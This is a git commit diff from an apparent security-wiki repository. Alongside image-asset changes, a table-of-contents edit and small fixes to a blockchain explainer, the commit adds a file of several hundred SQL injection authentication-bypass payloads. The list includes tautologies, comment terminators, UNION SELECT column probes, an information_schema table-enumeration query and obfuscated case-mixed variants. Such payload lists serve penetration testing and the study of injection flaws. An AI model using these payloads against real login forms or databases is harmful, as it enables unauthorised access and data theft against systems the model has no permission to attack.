GitBook: [#3092] No subject
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
After Width: | Height: | Size: 1.5 KiB |
BIN
.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1).png
Normal file
After Width: | Height: | Size: 72 KiB |
After Width: | Height: | Size: 93 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
After Width: | Height: | Size: 40 KiB |
BIN
.gitbook/assets/image (307) (3).png
Normal file
After Width: | Height: | Size: 74 KiB |
Before Width: | Height: | Size: 74 KiB After Width: | Height: | Size: 806 KiB |
After Width: | Height: | Size: 13 KiB |
BIN
.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1).png
Normal file
After Width: | Height: | Size: 766 KiB |
BIN
.gitbook/assets/image (413) (3) (3) (3) (2) (1) (2).png
Normal file
After Width: | Height: | Size: 766 KiB |
BIN
.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1).png
Normal file
After Width: | Height: | Size: 142 KiB |
BIN
.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (2).png
Normal file
After Width: | Height: | Size: 142 KiB |
After Width: | Height: | Size: 341 KiB |
After Width: | Height: | Size: 341 KiB |
After Width: | Height: | Size: 341 KiB |
After Width: | Height: | Size: 341 KiB |
After Width: | Height: | Size: 10 KiB |
After Width: | Height: | Size: 10 KiB |
After Width: | Height: | Size: 10 KiB |
After Width: | Height: | Size: 1.3 MiB |
After Width: | Height: | Size: 1.3 MiB |
After Width: | Height: | Size: 1.3 MiB |
After Width: | Height: | Size: 740 KiB |
BIN
.gitbook/assets/image (620) (1).png
Normal file
After Width: | Height: | Size: 24 KiB |
BIN
.gitbook/assets/image (638) (1) (1).png
Normal file
After Width: | Height: | Size: 137 KiB |
BIN
.gitbook/assets/image (638) (1) (2).png
Normal file
After Width: | Height: | Size: 137 KiB |
771
.gitbook/assets/sqli-authbypass-big (1).txt
Normal file
|
@ -0,0 +1,771 @@
|
|||
'-'
|
||||
' '
|
||||
'&'
|
||||
'^'
|
||||
'*'
|
||||
' or ''-'
|
||||
' or '' '
|
||||
' or ''&'
|
||||
' or ''^'
|
||||
' or ''*'
|
||||
"-"
|
||||
" "
|
||||
"&"
|
||||
"^"
|
||||
"*"
|
||||
" or ""-"
|
||||
" or "" "
|
||||
" or ""&"
|
||||
" or ""^"
|
||||
" or ""*"
|
||||
or true--
|
||||
" or true--
|
||||
' or true--
|
||||
") or true--
|
||||
') or true--
|
||||
' or 'x'='x
|
||||
') or ('x')=('x
|
||||
')) or (('x'))=(('x
|
||||
" or "x"="x
|
||||
") or ("x")=("x
|
||||
")) or (("x"))=(("x
|
||||
or 1=1
|
||||
or 1=1--
|
||||
or 1=1#
|
||||
or 1=1/*
|
||||
admin' --
|
||||
admin' #
|
||||
admin'/*
|
||||
admin' or '1'='1
|
||||
admin' or '1'='1'--
|
||||
admin' or '1'='1'#
|
||||
admin' or '1'='1'/*
|
||||
admin'or 1=1 or ''='
|
||||
admin' or 1=1
|
||||
admin' or 1=1--
|
||||
admin' or 1=1#
|
||||
admin' or 1=1/*
|
||||
admin') or ('1'='1
|
||||
admin') or ('1'='1'--
|
||||
admin') or ('1'='1'#
|
||||
admin') or ('1'='1'/*
|
||||
admin') or '1'='1
|
||||
admin') or '1'='1'--
|
||||
admin') or '1'='1'#
|
||||
admin') or '1'='1'/*
|
||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
||||
admin" --
|
||||
admin" #
|
||||
admin"/*
|
||||
admin" or "1"="1
|
||||
admin" or "1"="1"--
|
||||
admin" or "1"="1"#
|
||||
admin" or "1"="1"/*
|
||||
admin"or 1=1 or ""="
|
||||
admin" or 1=1
|
||||
admin" or 1=1--
|
||||
admin" or 1=1#
|
||||
admin" or 1=1/*
|
||||
admin") or ("1"="1
|
||||
admin") or ("1"="1"--
|
||||
admin") or ("1"="1"#
|
||||
admin") or ("1"="1"/*
|
||||
admin") or "1"="1
|
||||
admin") or "1"="1"--
|
||||
admin") or "1"="1"#
|
||||
admin") or "1"="1"/*
|
||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
||||
==
|
||||
=
|
||||
'
|
||||
' --
|
||||
' #
|
||||
' –
|
||||
'--
|
||||
'/*
|
||||
'#
|
||||
" --
|
||||
" #
|
||||
"/*
|
||||
' and 1='1
|
||||
' and a='a
|
||||
or 1=1
|
||||
or true
|
||||
' or ''='
|
||||
" or ""="
|
||||
1′) and '1′='1–
|
||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
||||
and 1=1
|
||||
and 1=1–
|
||||
' and 'one'='one
|
||||
' and 'one'='one–
|
||||
' group by password having 1=1--
|
||||
' group by userid having 1=1--
|
||||
' group by username having 1=1--
|
||||
like '%'
|
||||
or 0=0 --
|
||||
or 0=0 #
|
||||
or 0=0 –
|
||||
' or 0=0 #
|
||||
' or 0=0 --
|
||||
' or 0=0 #
|
||||
' or 0=0 –
|
||||
" or 0=0 --
|
||||
" or 0=0 #
|
||||
" or 0=0 –
|
||||
%' or '0'='0
|
||||
or 1=1
|
||||
or 1=1--
|
||||
or 1=1/*
|
||||
or 1=1#
|
||||
or 1=1–
|
||||
' or 1=1--
|
||||
' or '1'='1
|
||||
' or '1'='1'--
|
||||
' or '1'='1'/*
|
||||
' or '1'='1'#
|
||||
' or '1′='1
|
||||
' or 1=1
|
||||
' or 1=1 --
|
||||
' or 1=1 –
|
||||
' or 1=1--
|
||||
' or 1=1;#
|
||||
' or 1=1/*
|
||||
' or 1=1#
|
||||
' or 1=1–
|
||||
') or '1'='1
|
||||
') or '1'='1--
|
||||
') or '1'='1'--
|
||||
') or '1'='1'/*
|
||||
') or '1'='1'#
|
||||
') or ('1'='1
|
||||
') or ('1'='1--
|
||||
') or ('1'='1'--
|
||||
') or ('1'='1'/*
|
||||
') or ('1'='1'#
|
||||
'or'1=1
|
||||
'or'1=1′
|
||||
" or "1"="1
|
||||
" or "1"="1"--
|
||||
" or "1"="1"/*
|
||||
" or "1"="1"#
|
||||
" or 1=1
|
||||
" or 1=1 --
|
||||
" or 1=1 –
|
||||
" or 1=1--
|
||||
" or 1=1/*
|
||||
" or 1=1#
|
||||
" or 1=1–
|
||||
") or "1"="1
|
||||
") or "1"="1"--
|
||||
") or "1"="1"/*
|
||||
") or "1"="1"#
|
||||
") or ("1"="1
|
||||
") or ("1"="1"--
|
||||
") or ("1"="1"/*
|
||||
") or ("1"="1"#
|
||||
) or '1′='1–
|
||||
) or ('1′='1–
|
||||
' or 1=1 LIMIT 1;#
|
||||
'or 1=1 or ''='
|
||||
"or 1=1 or ""="
|
||||
' or 'a'='a
|
||||
' or a=a--
|
||||
' or a=a–
|
||||
') or ('a'='a
|
||||
" or "a"="a
|
||||
") or ("a"="a
|
||||
') or ('a'='a and hi") or ("a"="a
|
||||
' or 'one'='one
|
||||
' or 'one'='one–
|
||||
' or uid like '%
|
||||
' or uname like '%
|
||||
' or userid like '%
|
||||
' or user like '%
|
||||
' or username like '%
|
||||
' or 'x'='x
|
||||
') or ('x'='x
|
||||
" or "x"="x
|
||||
' OR 'x'='x'#;
|
||||
'=' 'or' and '=' 'or'
|
||||
' UNION ALL SELECT 1, @@version;#
|
||||
' UNION ALL SELECT system_user(),user();#
|
||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
||||
admin' and substring(password/text(),1,1)='7
|
||||
' and substring(password/text(),1,1)='7
|
||||
|
||||
==
|
||||
=
|
||||
'
|
||||
"
|
||||
'-- 2
|
||||
'/*
|
||||
'#
|
||||
"-- 2
|
||||
" #
|
||||
"/*
|
||||
'-'
|
||||
'&'
|
||||
'^'
|
||||
'*'
|
||||
'='
|
||||
0'<'2
|
||||
"-"
|
||||
"&"
|
||||
"^"
|
||||
"*"
|
||||
"="
|
||||
0"<"2
|
||||
|
||||
')
|
||||
")
|
||||
')-- 2
|
||||
')/*
|
||||
')#
|
||||
")-- 2
|
||||
") #
|
||||
")/*
|
||||
')-('
|
||||
')&('
|
||||
')^('
|
||||
')*('
|
||||
')=('
|
||||
0')<('2
|
||||
")-("
|
||||
")&("
|
||||
")^("
|
||||
")*("
|
||||
")=("
|
||||
0")<("2
|
||||
|
||||
'-''-- 2
|
||||
'-''#
|
||||
'-''/*
|
||||
'&''-- 2
|
||||
'&''#
|
||||
'&''/*
|
||||
'^''-- 2
|
||||
'^''#
|
||||
'^''/*
|
||||
'*''-- 2
|
||||
'*''#
|
||||
'*''/*
|
||||
'=''-- 2
|
||||
'=''#
|
||||
'=''/*
|
||||
0'<'2'-- 2
|
||||
0'<'2'#
|
||||
0'<'2'/*
|
||||
"-""-- 2
|
||||
"-""#
|
||||
"-""/*
|
||||
"&""-- 2
|
||||
"&""#
|
||||
"&""/*
|
||||
"^""-- 2
|
||||
"^""#
|
||||
"^""/*
|
||||
"*""-- 2
|
||||
"*""#
|
||||
"*""/*
|
||||
"=""-- 2
|
||||
"=""#
|
||||
"=""/*
|
||||
0"<"2"-- 2
|
||||
0"<"2"#
|
||||
0"<"2"/*
|
||||
|
||||
')-''-- 2
|
||||
')-''#
|
||||
')-''/*
|
||||
')&''-- 2
|
||||
')&''#
|
||||
')&''/*
|
||||
')^''-- 2
|
||||
')^''#
|
||||
')^''/*
|
||||
')*''-- 2
|
||||
')*''#
|
||||
')*''/*
|
||||
')=''-- 2
|
||||
')=''#
|
||||
')=''/*
|
||||
0')<'2'-- 2
|
||||
0')<'2'#
|
||||
0')<'2'/*
|
||||
")-""-- 2
|
||||
")-""#
|
||||
")-""/*
|
||||
")&""-- 2
|
||||
")&""#
|
||||
")&""/*
|
||||
")^""-- 2
|
||||
")^""#
|
||||
")^""/*
|
||||
")*""-- 2
|
||||
")*""#
|
||||
")*""/*
|
||||
")=""-- 2
|
||||
")=""#
|
||||
")=""/*
|
||||
0")<"2-- 2
|
||||
0")<"2#
|
||||
0")<"2/*
|
||||
|
||||
|
||||
'oR'2
|
||||
'oR'2'-- 2
|
||||
'oR'2'#
|
||||
'oR'2'/*
|
||||
'oR'2'oR'
|
||||
'oR(2)-- 2
|
||||
'oR(2)#
|
||||
'oR(2)/*
|
||||
'oR(2)oR'
|
||||
'oR 2-- 2
|
||||
'oR 2#
|
||||
'oR 2/*
|
||||
'oR 2 oR'
|
||||
'oR/**/2-- 2
|
||||
'oR/**/2#
|
||||
'oR/**/2/*
|
||||
'oR/**/2/**/oR'
|
||||
"oR"2
|
||||
"oR"2"-- 2
|
||||
"oR"2"#
|
||||
"oR"2"/*
|
||||
"oR"2"oR"
|
||||
"oR(2)-- 2
|
||||
"oR(2)#
|
||||
"oR(2)/*
|
||||
"oR(2)oR"
|
||||
"oR 2-- 2
|
||||
"oR 2#
|
||||
"oR 2/*
|
||||
"oR 2 oR"
|
||||
"oR/**/2-- 2
|
||||
"oR/**/2#
|
||||
"oR/**/2/*
|
||||
"oR/**/2/**/oR"
|
||||
|
||||
'oR'2'='2
|
||||
'oR'2'='2'oR'
|
||||
'oR'2'='2'-- 2
|
||||
'oR'2'='2'#
|
||||
'oR'2'='2'/*
|
||||
'oR'2'='2'oR'
|
||||
'oR 2=2-- 2
|
||||
'oR 2=2#
|
||||
'oR 2=2/*
|
||||
'oR 2=2 oR'
|
||||
'oR/**/2=2-- 2
|
||||
'oR/**/2=2#
|
||||
'oR/**/2=2/*
|
||||
'oR/**/2=2/**/oR'
|
||||
'oR(2)=2-- 2
|
||||
'oR(2)=2#
|
||||
'oR(2)=2/*
|
||||
'oR(2)=2/*
|
||||
'oR(2)=(2)oR'
|
||||
'oR'2'='2' LimIT 1-- 2
|
||||
'oR'2'='2' LimIT 1#
|
||||
'oR'2'='2' LimIT 1/*
|
||||
'oR(2)=(2)LimIT(1)-- 2
|
||||
'oR(2)=(2)LimIT(1)#
|
||||
'oR(2)=(2)LimIT(1)/*
|
||||
"oR"2"="2
|
||||
"oR"2"="2"oR"
|
||||
"oR"2"="2"-- 2
|
||||
"oR"2"="2"#
|
||||
"oR"2"="2"/*
|
||||
"oR"2"="2"oR"
|
||||
"oR 2=2-- 2
|
||||
"oR 2=2#
|
||||
"oR 2=2/*
|
||||
"oR 2=2 oR"
|
||||
"oR/**/2=2-- 2
|
||||
"oR/**/2=2#
|
||||
"oR/**/2=2/*
|
||||
"oR/**/2=2/**/oR"
|
||||
"oR(2)=2-- 2
|
||||
"oR(2)=2#
|
||||
"oR(2)=2/*
|
||||
"oR(2)=2/*
|
||||
"oR(2)=(2)oR"
|
||||
"oR"2"="2" LimIT 1-- 2
|
||||
"oR"2"="2" LimIT 1#
|
||||
"oR"2"="2" LimIT 1/*
|
||||
"oR(2)=(2)LimIT(1)-- 2
|
||||
"oR(2)=(2)LimIT(1)#
|
||||
"oR(2)=(2)LimIT(1)/*
|
||||
|
||||
'oR true-- 2
|
||||
'oR true#
|
||||
'oR true/*
|
||||
'oR true oR'
|
||||
'oR(true)-- 2
|
||||
'oR(true)#
|
||||
'oR(true)/*
|
||||
'oR(true)oR'
|
||||
'oR/**/true-- 2
|
||||
'oR/**/true#
|
||||
'oR/**/true/*
|
||||
'oR/**/true/**/oR'
|
||||
"oR true-- 2
|
||||
"oR true#
|
||||
"oR true/*
|
||||
"oR true oR"
|
||||
"oR(true)-- 2
|
||||
"oR(true)#
|
||||
"oR(true)/*
|
||||
"oR(true)oR"
|
||||
"oR/**/true-- 2
|
||||
"oR/**/true#
|
||||
"oR/**/true/*
|
||||
"oR/**/true/**/oR"
|
||||
|
||||
'oR'2'LiKE'2
|
||||
'oR'2'LiKE'2'-- 2
|
||||
'oR'2'LiKE'2'#
|
||||
'oR'2'LiKE'2'/*
|
||||
'oR'2'LiKE'2'oR'
|
||||
'oR(2)LiKE(2)-- 2
|
||||
'oR(2)LiKE(2)#
|
||||
'oR(2)LiKE(2)/*
|
||||
'oR(2)LiKE(2)oR'
|
||||
"oR"2"LiKE"2
|
||||
"oR"2"LiKE"2"-- 2
|
||||
"oR"2"LiKE"2"#
|
||||
"oR"2"LiKE"2"/*
|
||||
"oR"2"LiKE"2"oR"
|
||||
"oR(2)LiKE(2)-- 2
|
||||
"oR(2)LiKE(2)#
|
||||
"oR(2)LiKE(2)/*
|
||||
"oR(2)LiKE(2)oR"
|
||||
|
||||
admin
|
||||
admin'-- 2
|
||||
admin'#
|
||||
admin'/*
|
||||
admin"-- 2
|
||||
admin"#
|
||||
ffifdyop
|
||||
|
||||
' UniON SElecT 1,2-- 2
|
||||
' UniON SElecT 1,2,3-- 2
|
||||
' UniON SElecT 1,2,3,4-- 2
|
||||
' UniON SElecT 1,2,3,4,5-- 2
|
||||
' UniON SElecT 1,2#
|
||||
' UniON SElecT 1,2,3#
|
||||
' UniON SElecT 1,2,3,4#
|
||||
' UniON SElecT 1,2,3,4,5#
|
||||
'UniON(SElecT(1),2)-- 2
|
||||
'UniON(SElecT(1),2,3)-- 2
|
||||
'UniON(SElecT(1),2,3,4)-- 2
|
||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
||||
'UniON(SElecT(1),2)#
|
||||
'UniON(SElecT(1),2,3)#
|
||||
'UniON(SElecT(1),2,3,4)#
|
||||
'UniON(SElecT(1),2,3,4,5)#
|
||||
" UniON SElecT 1,2-- 2
|
||||
" UniON SElecT 1,2,3-- 2
|
||||
" UniON SElecT 1,2,3,4-- 2
|
||||
" UniON SElecT 1,2,3,4,5-- 2
|
||||
" UniON SElecT 1,2#
|
||||
" UniON SElecT 1,2,3#
|
||||
" UniON SElecT 1,2,3,4#
|
||||
" UniON SElecT 1,2,3,4,5#
|
||||
"UniON(SElecT(1),2)-- 2
|
||||
"UniON(SElecT(1),2,3)-- 2
|
||||
"UniON(SElecT(1),2,3,4)-- 2
|
||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
||||
"UniON(SElecT(1),2)#
|
||||
"UniON(SElecT(1),2,3)#
|
||||
"UniON(SElecT(1),2,3,4)#
|
||||
"UniON(SElecT(1),2,3,4,5)#
|
||||
|
||||
'||'2
|
||||
'||2-- 2
|
||||
'||'2'||'
|
||||
'||2#
|
||||
'||2/*
|
||||
'||2||'
|
||||
"||"2
|
||||
"||2-- 2
|
||||
"||"2"||"
|
||||
"||2#
|
||||
"||2/*
|
||||
"||2||"
|
||||
'||'2'='2
|
||||
'||'2'='2'||'
|
||||
'||2=2-- 2
|
||||
'||2=2#
|
||||
'||2=2/*
|
||||
'||2=2||'
|
||||
"||"2"="2
|
||||
"||"2"="2"||"
|
||||
"||2=2-- 2
|
||||
"||2=2#
|
||||
"||2=2/*
|
||||
"||2=2||"
|
||||
'||2=(2)LimIT(1)-- 2
|
||||
'||2=(2)LimIT(1)#
|
||||
'||2=(2)LimIT(1)/*
|
||||
"||2=(2)LimIT(1)-- 2
|
||||
"||2=(2)LimIT(1)#
|
||||
"||2=(2)LimIT(1)/*
|
||||
'||true-- 2
|
||||
'||true#
|
||||
'||true/*
|
||||
'||true||'
|
||||
"||true-- 2
|
||||
"||true#
|
||||
"||true/*
|
||||
"||true||"
|
||||
'||'2'LiKE'2
|
||||
'||'2'LiKE'2'-- 2
|
||||
'||'2'LiKE'2'#
|
||||
'||'2'LiKE'2'/*
|
||||
'||'2'LiKE'2'||'
|
||||
'||(2)LiKE(2)-- 2
|
||||
'||(2)LiKE(2)#
|
||||
'||(2)LiKE(2)/*
|
||||
'||(2)LiKE(2)||'
|
||||
"||"2"LiKE"2
|
||||
"||"2"LiKE"2"-- 2
|
||||
"||"2"LiKE"2"#
|
||||
"||"2"LiKE"2"/*
|
||||
"||"2"LiKE"2"||"
|
||||
"||(2)LiKE(2)-- 2
|
||||
"||(2)LiKE(2)#
|
||||
"||(2)LiKE(2)/*
|
||||
"||(2)LiKE(2)||"
|
||||
|
||||
')oR('2
|
||||
')oR'2'-- 2
|
||||
')oR'2'#
|
||||
')oR'2'/*
|
||||
')oR'2'oR('
|
||||
')oR(2)-- 2
|
||||
')oR(2)#
|
||||
')oR(2)/*
|
||||
')oR(2)oR('
|
||||
')oR 2-- 2
|
||||
')oR 2#
|
||||
')oR 2/*
|
||||
')oR 2 oR('
|
||||
')oR/**/2-- 2
|
||||
')oR/**/2#
|
||||
')oR/**/2/*
|
||||
')oR/**/2/**/oR('
|
||||
")oR("2
|
||||
")oR"2"-- 2
|
||||
")oR"2"#
|
||||
")oR"2"/*
|
||||
")oR"2"oR("
|
||||
")oR(2)-- 2
|
||||
")oR(2)#
|
||||
")oR(2)/*
|
||||
")oR(2)oR("
|
||||
")oR 2-- 2
|
||||
")oR 2#
|
||||
")oR 2/*
|
||||
")oR 2 oR("
|
||||
")oR/**/2-- 2
|
||||
")oR/**/2#
|
||||
")oR/**/2/*
|
||||
")oR/**/2/**/oR("
|
||||
')oR'2'=('2
|
||||
')oR'2'='2'oR('
|
||||
')oR'2'='2'-- 2
|
||||
')oR'2'='2'#
|
||||
')oR'2'='2'/*
|
||||
')oR'2'='2'oR('
|
||||
')oR 2=2-- 2
|
||||
')oR 2=2#
|
||||
')oR 2=2/*
|
||||
')oR 2=2 oR('
|
||||
')oR/**/2=2-- 2
|
||||
')oR/**/2=2#
|
||||
')oR/**/2=2/*
|
||||
')oR/**/2=2/**/oR('
|
||||
')oR(2)=2-- 2
|
||||
')oR(2)=2#
|
||||
')oR(2)=2/*
|
||||
')oR(2)=2/*
|
||||
')oR(2)=(2)oR('
|
||||
')oR'2'='2' LimIT 1-- 2
|
||||
')oR'2'='2' LimIT 1#
|
||||
')oR'2'='2' LimIT 1/*
|
||||
')oR(2)=(2)LimIT(1)-- 2
|
||||
')oR(2)=(2)LimIT(1)#
|
||||
')oR(2)=(2)LimIT(1)/*
|
||||
")oR"2"=("2
|
||||
")oR"2"="2"oR("
|
||||
")oR"2"="2"-- 2
|
||||
")oR"2"="2"#
|
||||
")oR"2"="2"/*
|
||||
")oR"2"="2"oR("
|
||||
")oR 2=2-- 2
|
||||
")oR 2=2#
|
||||
")oR 2=2/*
|
||||
")oR 2=2 oR("
|
||||
")oR/**/2=2-- 2
|
||||
")oR/**/2=2#
|
||||
")oR/**/2=2/*
|
||||
")oR/**/2=2/**/oR("
|
||||
")oR(2)=2-- 2
|
||||
")oR(2)=2#
|
||||
")oR(2)=2/*
|
||||
")oR(2)=2/*
|
||||
")oR(2)=(2)oR("
|
||||
")oR"2"="2" LimIT 1-- 2
|
||||
")oR"2"="2" LimIT 1#
|
||||
")oR"2"="2" LimIT 1/*
|
||||
")oR(2)=(2)LimIT(1)-- 2
|
||||
")oR(2)=(2)LimIT(1)#
|
||||
")oR(2)=(2)LimIT(1)/*
|
||||
')oR true-- 2
|
||||
')oR true#
|
||||
')oR true/*
|
||||
')oR true oR('
|
||||
')oR(true)-- 2
|
||||
')oR(true)#
|
||||
')oR(true)/*
|
||||
')oR(true)oR('
|
||||
')oR/**/true-- 2
|
||||
')oR/**/true#
|
||||
')oR/**/true/*
|
||||
')oR/**/true/**/oR('
|
||||
")oR true-- 2
|
||||
")oR true#
|
||||
")oR true/*
|
||||
")oR true oR("
|
||||
")oR(true)-- 2
|
||||
")oR(true)#
|
||||
")oR(true)/*
|
||||
")oR(true)oR("
|
||||
")oR/**/true-- 2
|
||||
")oR/**/true#
|
||||
")oR/**/true/*
|
||||
")oR/**/true/**/oR("
|
||||
')oR'2'LiKE('2
|
||||
')oR'2'LiKE'2'-- 2
|
||||
')oR'2'LiKE'2'#
|
||||
')oR'2'LiKE'2'/*
|
||||
')oR'2'LiKE'2'oR('
|
||||
')oR(2)LiKE(2)-- 2
|
||||
')oR(2)LiKE(2)#
|
||||
')oR(2)LiKE(2)/*
|
||||
')oR(2)LiKE(2)oR('
|
||||
")oR"2"LiKE("2
|
||||
")oR"2"LiKE"2"-- 2
|
||||
")oR"2"LiKE"2"#
|
||||
")oR"2"LiKE"2"/*
|
||||
")oR"2"LiKE"2"oR("
|
||||
")oR(2)LiKE(2)-- 2
|
||||
")oR(2)LiKE(2)#
|
||||
")oR(2)LiKE(2)/*
|
||||
")oR(2)LiKE(2)oR("
|
||||
admin')-- 2
|
||||
admin')#
|
||||
admin')/*
|
||||
admin")-- 2
|
||||
admin")#
|
||||
') UniON SElecT 1,2-- 2
|
||||
') UniON SElecT 1,2,3-- 2
|
||||
') UniON SElecT 1,2,3,4-- 2
|
||||
') UniON SElecT 1,2,3,4,5-- 2
|
||||
') UniON SElecT 1,2#
|
||||
') UniON SElecT 1,2,3#
|
||||
') UniON SElecT 1,2,3,4#
|
||||
') UniON SElecT 1,2,3,4,5#
|
||||
')UniON(SElecT(1),2)-- 2
|
||||
')UniON(SElecT(1),2,3)-- 2
|
||||
')UniON(SElecT(1),2,3,4)-- 2
|
||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
||||
')UniON(SElecT(1),2)#
|
||||
')UniON(SElecT(1),2,3)#
|
||||
')UniON(SElecT(1),2,3,4)#
|
||||
')UniON(SElecT(1),2,3,4,5)#
|
||||
") UniON SElecT 1,2-- 2
|
||||
") UniON SElecT 1,2,3-- 2
|
||||
") UniON SElecT 1,2,3,4-- 2
|
||||
") UniON SElecT 1,2,3,4,5-- 2
|
||||
") UniON SElecT 1,2#
|
||||
") UniON SElecT 1,2,3#
|
||||
") UniON SElecT 1,2,3,4#
|
||||
") UniON SElecT 1,2,3,4,5#
|
||||
")UniON(SElecT(1),2)-- 2
|
||||
")UniON(SElecT(1),2,3)-- 2
|
||||
")UniON(SElecT(1),2,3,4)-- 2
|
||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
||||
")UniON(SElecT(1),2)#
|
||||
")UniON(SElecT(1),2,3)#
|
||||
")UniON(SElecT(1),2,3,4)#
|
||||
")UniON(SElecT(1),2,3,4,5)#
|
||||
')||('2
|
||||
')||2-- 2
|
||||
')||'2'||('
|
||||
')||2#
|
||||
')||2/*
|
||||
')||2||('
|
||||
")||("2
|
||||
")||2-- 2
|
||||
")||"2"||("
|
||||
")||2#
|
||||
")||2/*
|
||||
")||2||("
|
||||
')||'2'=('2
|
||||
')||'2'='2'||('
|
||||
')||2=2-- 2
|
||||
')||2=2#
|
||||
')||2=2/*
|
||||
')||2=2||('
|
||||
")||"2"=("2
|
||||
")||"2"="2"||("
|
||||
")||2=2-- 2
|
||||
")||2=2#
|
||||
")||2=2/*
|
||||
")||2=2||("
|
||||
')||2=(2)LimIT(1)-- 2
|
||||
')||2=(2)LimIT(1)#
|
||||
')||2=(2)LimIT(1)/*
|
||||
")||2=(2)LimIT(1)-- 2
|
||||
")||2=(2)LimIT(1)#
|
||||
")||2=(2)LimIT(1)/*
|
||||
')||true-- 2
|
||||
')||true#
|
||||
')||true/*
|
||||
')||true||('
|
||||
")||true-- 2
|
||||
")||true#
|
||||
")||true/*
|
||||
")||true||("
|
||||
')||'2'LiKE('2
|
||||
')||'2'LiKE'2'-- 2
|
||||
')||'2'LiKE'2'#
|
||||
')||'2'LiKE'2'/*
|
||||
')||'2'LiKE'2'||('
|
||||
')||(2)LiKE(2)-- 2
|
||||
')||(2)LiKE(2)#
|
||||
')||(2)LiKE(2)/*
|
||||
')||(2)LiKE(2)||('
|
||||
")||"2"LiKE("2
|
||||
")||"2"LiKE"2"-- 2
|
||||
")||"2"LiKE"2"#
|
||||
")||"2"LiKE"2"/*
|
||||
")||"2"LiKE"2"||("
|
||||
")||(2)LiKE(2)-- 2
|
||||
")||(2)LiKE(2)#
|
||||
")||(2)LiKE(2)/*
|
||||
")||(2)LiKE(2)||("
|
||||
' UnION SELeCT 1,2`
|
||||
' UnION SELeCT 1,2,3`
|
||||
' UnION SELeCT 1,2,3,4`
|
||||
' UnION SELeCT 1,2,3,4,5`
|
||||
" UnION SELeCT 1,2`
|
||||
" UnION SELeCT 1,2,3`
|
||||
" UnION SELeCT 1,2,3,4`
|
||||
" UnION SELeCT 1,2,3,4,5`
|
|
@ -10,7 +10,7 @@ dht udp "DHT Nodes"
|
|||
|
||||
![](<.gitbook/assets/image (273).png>)
|
||||
|
||||
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1).png>)
|
||||
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1) (1).png>)
|
||||
|
||||
InfluxDB
|
||||
|
||||
|
|
|
@ -543,6 +543,7 @@
|
|||
* [Apache Airflow](cloud-security/apache-airflow/README.md)
|
||||
* [Airflow Configuration](cloud-security/apache-airflow/airflow-configuration.md)
|
||||
* [Airflow RBAC](cloud-security/apache-airflow/airflow-rbac.md)
|
||||
* [Atlantis](cloud-security/atlantis.md)
|
||||
* [Cloud Security Review](cloud-security/cloud-security-review.md)
|
||||
* [AWS Security](cloud-security/aws-security.md)
|
||||
|
||||
|
@ -558,7 +559,8 @@
|
|||
|
||||
## Blockchain
|
||||
|
||||
* [Blockchain & Crypto Currencies](blockchain/blockchain-and-crypto-currencies.md)
|
||||
* [Blockchain & Crypto Currencies](blockchain/blockchain-and-crypto-currencies/README.md)
|
||||
* [Page 1](blockchain/blockchain-and-crypto-currencies/page-1.md)
|
||||
|
||||
## Courses and Certifications Reviews
|
||||
|
||||
|
|
|
@ -42,7 +42,7 @@ _**Sig**_ = _**Fsig**_(_**Fhash**_(_**m**_),_**dA**_)
|
|||
|
||||
Where:
|
||||
|
||||
* _d_A is the signing **private key**
|
||||
* \_d\_A is the signing **private key**
|
||||
* _m_ is the **transaction**
|
||||
* Fhash is the hashing function
|
||||
* Fsig is the signing algorithm
|
||||
|
@ -84,7 +84,7 @@ There are **2 main types** of transactions:
|
|||
This protocol helps to **perform several transactions to a channe**l and **just** **sent** the **final** **state** to the blockchain to save it.\
|
||||
This **improves** bitcoin blockchain **speed** (it just on allow 7 payments per second) and it allows to create **transactions more difficult to trace** as the channel is created via nodes of the bitcoin blockchain:
|
||||
|
||||
![](<../.gitbook/assets/image (611).png>)
|
||||
![](<../../.gitbook/assets/image (611).png>)
|
||||
|
||||
Normal use of the Lightning Network consists of **opening a payment channel** by committing a funding transaction to the relevant base blockchain (layer 1), followed by making **any number** of Lightning Network **transactions** that update the tentative distribution of the channel's funds **without broadcasting those to the blockchain**, optionally followed by closing the payment channel by **broadcasting** the **final** **version** of the settlement transaction to distribute the channel's funds.
|
||||
|
||||
|
@ -175,7 +175,7 @@ Some other services can be also used as mixers, like Bitcoin casinos where you c
|
|||
### CoinJoin
|
||||
|
||||
**CoinJoin** will **mix several transactions of different users into just one** in order to make more **difficult** for an observer to find out **which input is related to which output**.\
|
||||
This offers a new level of privacy, however, **some** **transactions** where some input and output amounts are correlated or are very different from the rest of the inputs and outputs **can still be correlated** by the external observer.
|
||||
This offers a new level of privacy, however, **some** **transactions** where some input and output amounts are correlated or are very different from the rest of the inputs and outputs **can still be correlated** by the external observer.
|
||||
|
||||
